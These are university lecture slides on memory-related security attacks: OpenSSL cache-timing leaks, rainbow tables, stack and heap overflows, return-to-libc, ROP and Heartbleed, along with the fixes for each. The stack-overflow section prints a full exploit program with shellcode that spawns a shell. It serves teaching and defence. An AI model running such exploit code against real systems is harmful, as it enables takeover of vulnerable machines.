Post on 08-Jul-2020
TutorialMemory issues
CS2107 Introduction to Information andSystem Security
(Slide set 9)
Hugh Anderson
National University of SingaporeSchool of Computing
October, 2016
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
Memory... Not yours - the computers!
TutorialMemory issues
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
TutorialMemory issues
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
TutorialMemory issues
Resources
For this lecture,from SEv2.pdf, section 4.4.
http://phrack.org/issues/49/14.html
http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
TutorialMemory issues
OpenSSL side-channel attack (Feb 2014)Reversing a hash
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
OpenSSL side channel attack
OpenSSL: An important bit of security softwareWhy?Because it is used in about 60% of all web based ssl (https) servers.As a result of this we are very interested in bugs in openssl.It may be the software most closely examined for security errors - all 700,000lines of code!
What is the (one second) attack?From the paper at http://eprint.iacr.org/2014/140.pdf .
“Our attack recovers the scalar k and thus the secret key of thesigner and would therefore allow unlimited forgeries.”
The attack is a side channel attack. An attacker can determine if code hasbeen cached or not. If it has been used, then it will be cached.
Timing attack on a constant time function!
Simple, and the Montgommery ladder:
Q = O;foreach bit in key {
Q = 2Q;if (bit==0) {
Q = Q + P;}
}return Q;
R0 = Q;R1 = P;foreach bit in key {
if (bit==0) {R1 = R0 + R1;R0 = 2R0;
} else {R0 = R0 + R1;R1 = 2R1;
}}return R0;
Both functions return the same result, but the one on the right runs in aconstant time...OpenSSL is built with security in mind, so (of course) it uses theMontgommery ladder - the code to the right, that runs in constant time.
OpenSSL running a program
As openssl program runs, it caches the code...
...
1 nS 70nS
Program memory
Processes:
if (!gf2m_Madd(group, ...
if (!gf2m_Madd(group, ...
if (!gf2m_Mdouble(group, ... } else {
if (!gf2m_Mdouble(group, ...
...
}
if (word & mask)
Instruction cache
...
...
...
CPU
OpenSSL
Attacker
is cached when
(FOR SPEED!)
Cache "lines"
Code in memory here
first used here...
If bit is a “1” THIS is cached...
if (word & mask)
Instruction cache
...
...
...
CPU
1 nS 70nS
Program memory
Processes:
...
if (!gf2m_Mdouble(group, ... } else { if (!gf2m_Madd(group, ...
if (!gf2m_Mdouble(group, ...
}
...
if (!gf2m_Madd(group, ...
OpenSSL
Attacker
C
D
...
B
A
(and the attacker can determine this by seeing how fast the four cachelinesA,B,C,D are loaded)
If bit is a “0” THIS is cached...
if (word & mask)
Instruction cache
...
...
...
CPU
1 nS 70nS
Program memory
Processes:
...
if (!gf2m_Mdouble(group, ... } else { if (!gf2m_Madd(group, ...
if (!gf2m_Mdouble(group, ...
}
...
if (!gf2m_Madd(group, ...
OpenSSL
Attacker
C
D
...
B
A
(and the attacker can determine this by seeing how fast the four cachelinesA,B,C,D are loaded)
OpenSSL timing
Original openssl-1.0.1f/crypto/ec/ec2_mult.c...if (word & mask) {
gf2m_Madd(..., x1, ...} else {
gf2m_Madd(..., x2, ...}
Each bit of a word is being tested, and depending on the bit we take twodifferent paths. The paths operate on different (code) memory locations. If aparticular path is taken, then a particular memory location would be cached,and an attacker can (afterwards) discover that, because that memory locationwould load faster. In this way an attacker can determine which path wastaken and hence the value of each bit.
Fixed openssl-1.0.1g/crypto/ec/ec2_mult.c...BN_consttime_swap(word & mask, x1, x2,...gf2m_Madd(...BN_consttime_swap(word & mask, x1, x2,...
We use a constant time swap, to put the variables in the same memorylocations.
TutorialMemory issues
OpenSSL side-channel attack (Feb 2014)Reversing a hash
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
Reversing a hash...
Precomputed tables for helping find collisions?
A precomputed table for 10character (A-Z,a-z,0-9) pass-words, might have (say) 6210 =839, 299, 365, 868, 340, 224entries, each containing a 16byte value. Thats a big disk(about 13,000,000 TB).
Indexing by hash is evenworse. We do not really havenames for disks that big.
Password (MD5) Hash
aaaaaaaa 3dbe00a1676...
aaaaaaab 2125ea8b81b...
aaaaaaac ea67f32d4e6...
aaaaaaad 746a8ab05d6...
aaaaaaae c554d695eb0...
aaaaaaaf 09eb61fd25b...
aaaaaaag 68b5af18408...
... ...
Reversing a hash: “rainbow” tables
Precompute long chains, but only keep two values
Precompute chains of val-ues starting from a pass-word guess, and usingalternate hash functionsh(p), and a reversing func-tion r(h), which gener-ates a predictable plausibleguess from the hash.
Only store the first and lastentries from the chain. Itis space efficient, and youcan re-compute the inter-mediate values (a space-time tradeoff).
Chain #1Compute:
Chain #2
h(p)
r(h)
h(p)
h(p)
h(p)
h(p)
r(h)
r(h)
r(h)
h(p)
Store:
cracyl13d
f0e377b6.. srxx21tryfedc1234..aaaaaaaaa
srxx21try
4fad6544..
asbdhdf13
aaaaaaaaa
0a224fad..
2399afb0..
mlacziryt
f0e377b6..
xyuivlzrs
d001afde..
fedc1234..
Reversing a hash: “rainbow” tables
Precompute long chains, but only keep two values
h(p)
1. Compute chain from hash
r(h)
h(p)
2. Compare candidates with chain ends
h(p)
r(h)
3. Recompute chain to reverse hash
4. Passwordasbdhdf13
aaaaaaaaa
srxx21try
srxx21try
4fad6544..
fedc1234..
f0e377b6..
d001afde..
d001afde..
cracyl13d
fedc1234..
In practice: ophcrack
The old LM windows hash
TutorialMemory issues
Memory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
Outline of memory usage
We will...Discuss the use of computer memory in OS
Discuss storage techniques for data
Outline the properties of the stack, main memory and the heap
What is memory used for?To store programs (maybe in code or text segments).
To store data - variables, constants, strings... (in a data segment)
To store local transitory data such as return addresses when you call afunction or method, and local method variables (in the stack segment).
What do you mean...Return address?
... and what is a stack when it is at home?
How programs use memory for return addresses
Return addresses need to be nested, so we use a stack:
Stack
10 readInput() {
...
...
24 }
.. ...
.. ...
31 processItem() {
32 ...
.. ...37 }......
43 processData() {
44 ...45 processItem();46 ..... ...54 }......65 main() {66 ...67 readInput();68 ...
// Save away 46 and call processItem()
// Return to the most recent saved away address
// Return to the most recent saved away address
// Return to the most recent saved away address
main()
68
65
66
67
69
70
71
72
73 }
69 ...70 ...71 processData();
72 ...
73
24
...
43
44
45
46
...
readInput()
processData()
31
processItem()
37
54
Stack
Stack
Stack
// Save away 68 and call readInput()
// Save away 72 and call processData()
10
68
72 46
72
A little warning...Later, we will use stacks that are upside down, because that is howcomputers use stacks - they grow towards lower/smaller addresses.
How programs use memory for data
Storing a string will come back to haunt us...Operating systems, and many applications are written in C.
In C, a string like Hello is stored in six successive bytes, the fivecharacters, and a NULL terminating character. This allowscompact representation, and fast access to a string.In Java for contrast, a string is stored as an object. For a fivecharacter string, the storage takes up 48 bytes: An objectcontaining the actual characters; an integer offset into the array atwhich the string starts; the length of the string; and another int.This results in non-compact representation, and slow access.
When memory is needed for a program, the OS allocates memory:
The calls to access memory are malloc() and free().Java maintains its own heap, separate from the system heap.When lots of allocations and deallocations are being made, theheap may become fragmented.The OS will run a garbage collector to fix up the heap from time totime.
Memory hierarchy
For small embedded systems: one level of memoryProgram variables are next to each other in memory - no protectionbetween processes.
Primary memory (RAM/ROM) may store and retrieve values in 20nS.
For Windows/GNU+Linux: protection, and a heirarchy...Process variables in memory are not visible to other processes.
There is a heirarchy of memory:
Values in a register or cache accessed in less than 1nS,Primary/physical memory (ROM/RAM) may take 10nS to access.Secondary memory (i.e. a disk) - milliseconds access time.
Windows/GNU+Linux: virtual memory addressing
OverviewModern operating systems and hardware give each process anindividual address space - normally starting at address 0.
These addresses cannot directly map onto the same address ofreal memory, because then each process would just be seeing thesame memory.
Instead a translation unit maps this virtual address to a real physicaladdress.
It is common for a virtual address space to be the entire hardwareaddress space of the processor - that is the address range theprocessor could access using all its address lines.
Process use of memory
Virtual memory, physical memory, and translations...
prog 1
prog 2
memoryPhysical
Virtualmemory
Translations
OS kernel
The processes, and the OS kernel, each have their own view ofmemory, somehow mapped/translated to the real (physical) memory.
Virtual memory
Simple memory versus VM memory
CPU
RAM
Data Bus
0002 2
0
1
2
3
4
ROM
MMU RAM I/O #1
Lowerorder
addresslines
Table
Virtual addressPhysical address
CPU
Address
Data Bus
High
Disk
Speed
Virtual memory also allows the execution of programs that may notreside completely in memory, by using disk to act as memory.
VM systems may provide a virtual address space much larger than thephysical address space.
GNU+Linux memory allocation
3G before OS kernel v2.6, 4G afterwards
user
kernel
0x00000000
0xffffffff
0x00000000
0xffffffff
0x7fffffff0x80000000
0xbfffffff0xc0000000
4G (after v2.6)3G (before v2.6)
OS Kernel contains drivers, system stacks, page tables...
User contains executable code, libraries, stacks...
... and swap ...
Secondary storage (disk) stores memory contentsThe part of the disk used in this way is called the ’swap’ - it may beeither a
file used for the purpose, ora partition of disk.
It is common for VM systems to have a swap area two to ten times aslarge as the physical memory.
VM=paging+segments (+disk)...
The Intel CPU chip can use both segmentation and paging:
GDT
LDT
(16 bits)
0 1
index modeCS
(base) (limit)
offset
+Check limit
(32 bits)
Linear
address
Page directory Page table
Frames
dddddddddd tttttttttt oooooooooooo
Logical address
Linear
Lookup inGDT
Pagingvia tables
addressPhysicaladdress
0x002012170xc0132217cs:offset
Process view: GNU+Linux ELF format segments
Program, shared libraries, stack...
0x00000000
0x00010000
guard
Linux/ELF user memory
0xbfffffff
0x40000000
0x84000000
ma
lloc
co
de
da
ta
bss
co
de
da
ta
bss
C libraries stack
stack
Program
guard
Malloc’ed memory “above” the program...
Stack grows downwards...
Summary...
Use and architecture of memory:Memory is used to store programs, data, and the stack.
Simple memory systems are found in embedded systems (i.e. smartcards), where there is no protection of memory.
Complex memory systems manage heaps of memory for use byprograms. Java maintains its own heap.
Applications use malloc() and free() to access memory from the heap.
Larger operating systems use VM (Virtual memory):
VM may use segments (i.e. a code segment, a data segment or astack segment), andVM may use paging (i.e. memory managed in small fixed sizechunks).
Segments are protected from each other.
GNU+Linux and Windows both use paging and segments.
Remember also the swap area on disk, and page faults.
TutorialMemory issues
Memory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
Attacks based on the computer’s memory
In all this complexity...There are many memory attacks:
Direct attacks on protected and unprotected memory systems.Direct attacks on the processor, its memory managementhardware, and the page fault system.Attacks on the disk/swap space.Attacks on the system heap, the Java heap, the garbagecollectors.Attacks on the page tables, the segment tables.
We will start with the two most well known:
Memory attack 1: Stack/Buffer overflows; how they happen, andapproaches to reduce the likelihood of an attackMemory attack 2: Heap/Buffer overflows; how they happen, andapproaches to reduce the likelihood of an attack.
Memory attack 1: stack/buffer overflow
Most well known compromise of computer systemsOne of a general class of problems caused by
software that does not check its parameters for extreme values
The attack mechanism is:
Find a program that accepts input from us (or our attackingprogram), and uses a buffera without checking bounds.Deliver EGG to it to overflow bufferOverwrite stack return address with address of OUR codeProgram then runs OUR code.
Need to examine the way programs use memory.
Presentation based on
http://phrack.org/issues/49/14.html
aA buffer is just an array you are using for temporary storage.
Memory attack 1: simple program
A pretty simple program...
void main (int argc, char *argv[]) { char buffer[512]; printf ("Argument is %s\n", argv[1]); strcpy (buffer, argv[1]); }
CODE LISTING vulnerable.c
When we run it:
[hugh@pnp176-44 programs]$ ./vulnerable testArgument is test[hugh@pnp176-44 programs]$
but...
Memory attack 1: simple program
Normal operation
������������
������������
����������������������������������������������������
����������������������������������������������������
Stack
Stack grows down...
Return address
Buffer (512 bytes)
Computer’s Memory
Arguments
Variables
Overwrite the end of an array, with an "EGG"
����������������������������������������������������
����������������������������������������������������
������������������������������������������������������������������������������������������������������������������������������������������������
������������������������������������������������������������������������������������������������������������������������������������������������
Stack
Stack grows down...
Return address
Computer’s Memory
Arguments
Variables
Memory attack 1: Code creates EGG...
#include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp (void) { __asm__ ("movl %esp,%eax"); } void main (int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi (argv[1]); if (argc > 2) offset = atoi (argv[2]); if (!(buff = malloc (bsize))) { printf ("Can’t allocate memory.\n"); exit (0); } addr = get_sp () − offset; printf ("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr; for (i = 0; i < bsize / 2; i++) buff[i] = NOP; ptr = buff + ((bsize / 2) − (strlen (shellcode) / 2)); for (i = 0; i < strlen (shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize − 1] = ’\0’; memcpy (buff, "EGG=", 4); putenv (buff); system ("/bin/bash"); }
CODE LISTING exploit3.cCODE LISTING exploit3.c
Smashing the stack - the payload!
Contents of the payload
Stack
Computer’s Memory
machine code Malicious return
address
The payload
Machine code for
the exploit
Multiple no−op Multiple copies of
Payload code for an exploit
A C program which calls a shell...
#include <stdio.h>void main() {
char *nm[2];nm[0] = "/bin/sh";nm[1] = NULL;execve(nm[0], nm, NULL);
}
movl string,string_addrmovb $0x0,null_bytemovl $0x0,null_addrmovl $0xb,%eaxmovl string,%ebxleal string,%ecxleal null_string,%edxint $0x80 // OS call“/bin/sh” string goes here.
At the left we see some C source code for running the program /bin/sh. Onthe right we see assembler code with extra OS nonsense removed.
Note that the binary code program has “zeroes” in it, andthese will have to be removed if strcpy is to copy the pro-gram onto the stack. We can use translations like:
movb $0x0,null_byte xorl %eax,%eaxmovb eax, null_byte
Using the buffer overflow attack
3 examples of situations in which we can use it1 A server (say a web server) that expects a query, and returns a
response. The demo buffer overflow attack done in class is one ofthese.
2 A CGI/ASP or perl script inside a web server3 A SUID root program on a UNIX system
Find a program that has a buffer, ... and that does notcheck its bounds. Then deliver an EGG to it to overflowthe buffer.Overwrite stack return address with address of OUR code.The program then runs OUR code.
Example attackMany attacks on Microsoft systems are based on various buffer overflowproblems. CA-2003-20 W32/Blaster worm:The W32/Blaster worm exploits a vulnerability in Microsoft’s DCOM RPCinterface as described in VU#568148 and CA-2003-16. Upon successfulexecution....
Memory attack 1: example
Consider the following scenario...
The Virtual machine running on the mac is running GNU+Linux,
VM Honeypot on Hugh’s mac
(hack from here)(Virtual) web server
Hugh’s mac
and a (cut down) version of an old version of Apache web server
Memory attack 1(a): web server code...
And in the web server we have this code:
void process(int newsockfd) {char line[512];......NEXT BIT DOESNT CHECK ARRAY SIZE! i.e. n<511while (n>0 && c!=’\n’) {
n = read (newsockfd, &c, 1);... add it to line[idx++]...
}...return;
}
The general operation of this web server is hackable...It matches our attack mechanism: A web server receives a file spec(index.html), and does not properly check a buffer that it puts the spec into.
We replace the file spec with EGG. Note that we will have to use aspecialized program to deliver the EGG (i.e. not firefox)
How to fix buffer overflows?
Find them! ... But also...Use safety technologies:
DEP: Not allowing execution of code in the stack segment (as inMacOSX/openBSD).ASLR: Address space layout randomization - randomly movingthe starting memory locations for processes. Implemented inGNU+Linux since 2005, and in Windows since 2007.Putting a value just below the return address (a canary), andchecking it before doing a return from subroutine.
It is hard to overwrite the return address without overwritingthe canary.This is standard now in Visual Studio and gcc compilers.
Use good programming practice:
Always check ranges of parameters, and be careful with arrays.man strcpy
Memory attack 1(b): return to libc!
Even with DEP: run code already in libc...
Bu
ffer
Return
address
High
Memory
This has the address of
the libc system call system().
argument to the system call...
You still need to provide an
so you get system("/bin/sh")
Memory attack 1(c): return oriented programming
Even with DEP: find code snippets, and overwrite stack...
Bu
ffer
Return
address
High
Memory
eax += ebx;
....
Resultant execution:
Code snippets
somewhere in
memory
42
212
pop eax
ret
pop ebx
ret
add eax,ebx
ret
eax = 42;
ebx = 212;
Memory attack 2: heap overflow
The younger sibling of the buffer overflowThe heap is managed by the OS as a doubly linked data structure,containing a header, and the memory to be allocated.
The attacker starts by constructing/coding something that results in theOS allocating and deallocating memory from the heap. Then:
After the malloc(), the program writes to the memory, and thenreturns it using free(). By careful choice of what we write to thememory, we can overwrite the NEXT header in the heap.The OS then merges this freed-up memory, manipulating theheaders in order to do so. It rewrites values in the previousheaders that are dependent on the values in the next headers.If the next header is modified to point to some place where areturn address is being kept, then we can run crafted code.
Background reading:http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html
Memory attack 2: heap overflow
Consider the following part of a heap...
Backward linksForward links the heap
Chunk of free
Chunk of in−use
memory on
the heap
memory on
Chunk of in−use
memory on
the heap
Memory attack 2: heap overflow
The normal free() and merge...
one: free()
m[p[1]][1] is the
Note that merging
involves setting
value in p[0].
forward pointerReturn this
m[p[1]][0] is the
m[p[1]] is the heap
m[p[1]][1]
m[p[1]][0]
location that p1 points to.
p[1]
p[0]
m[p[1]][0] to have the
collection)
(garbage
the links
Then merge
backward pointer
Chunk of free
the heap
the heap
memory on
memory on
the heap
memory on
memory on
the heap
Chunk of in−use
Merged (bigger)
memory on
the heap
memory on
memory on
the heap
the heap
Chunk of free
Chunk of in−use
Chunk of free
Chunk of free
memory on
the heap
Chunk of in−use
Chunk of in−use
2 31
The OS heap management software automatically rewrites the valuesof the forward and backward links, using the values in the next links.
Memory attack 2: heap overflow
Consider the scenario where attacker changes pointers...
the links
Return this
one: free()
collection)
(garbage
Then merge
up now...memory on
the heap
memory on
memory on
the heap
the heap
Chunk of free
Chunk of in−use
Chunk of in−use
memory on
the heap
Chunk of in−use
memory on
the heap
memory on
memory on
the heap
the heap
Chunk of free
Chunk of in−use
Chunk of in−use
Links all messed
vector.
Later the return instruction
is done (same as in buffer
overflow), and the system starts
executing bad code.
1 2 3
return vectorAddress
of bad
code
Address of
return vector
of bad
code
Address ofThe garbage collector
writes the address of the
bad code into the returnAddress
The attacker uses the OS GC to write the address of malicious codeinto a return-address location, as for the buffer overflow.
Memory attack 2: heap overflow
Forms another mechanism for vectoring to code...Heap attacks have been done on both the Java and OS heaps.
An example heap attack was found in the Microsoft GDI+ WMF heapoverflow attack (2009). There were exploits of this in the wild.
According to Symantec, in the Microsoft GDI+ WMF attack:
A remote code execution vulnerability exists in the way that GDI+allocates buffer size when handling WMF image files.The vulnerability could allow remote code execution if a useropens a specially crafted WMF image file or browses to a Website that contains specially crafted content.An attacker who successfully exploited this vulnerability could takecomplete control of an affected system.An attacker could then install programs; view, change, or deletedata; or create new accounts with full user rights.Users whose accounts are configured to have fewer user rights onthe system could be less impacted than users who operate withadministrative user rights.
TutorialMemory issues
Memory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Outline
1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash
2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)
Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)
OpenSSL Heartbeat
What is a heartbeat in openssl?A heartbeat is a recent (February 2012) extension to TLS, to allow a client tocheck if a TLS server is still alive (rather than tearing down a connection andrenegotiating).It is described in https://tools.ietf.org/html/rfc6520.The general idea is that clients can request a heartbeat, sending aheartbeat_request message with this structure:
struct {HeartbeatMessageType type;uint16 payload_length;opaque payload[payload_length];...
} HeartbeatMessage;
The server will send back the payload in a matching heartbeat_response.
What is the issue?What if the client lied about the payload_length?
OpenSSL Heartbeat, Hearts bleed
Request and response different...
OpenSSL Heartbeat
Original openssl-1.0.1f/ssl/d1_both.c.../* Read type and payload length first */
hbtype = *p++;n2s(p, payload);pl = p; ...
The original source gets the type from the record that p points to, and puts itinto hbtype. It then copies the next two bytes into the variable payload. Thisis the length of the payload, and is done without checking. The variable pl isthe actual payload, which is later echoed, using the length value without anymore checking.
Fixed openssl-1.0.1g/ssl/d1_both.c.../* Read type and payload length first */
hbtype = *p++;n2s(p, payload);if (1 + 2 + payload + 16 > s->s3->rrec.length)
return 0; /* silently discard */pl = p; ...
(There is a little more, but that is the general idea).
Summary...
The attacksOverflow attacks can be used to execute arbitrary code (that is, codethat is picked by the attacker).
This is obviously extremely dangerous.
In the case of applications or systems you build or design, the importantthing is to make sure that buffers cannot be overwritten.
However, it may be that the attacked buffer or heap is part of the OS,and not exactly your responsibility.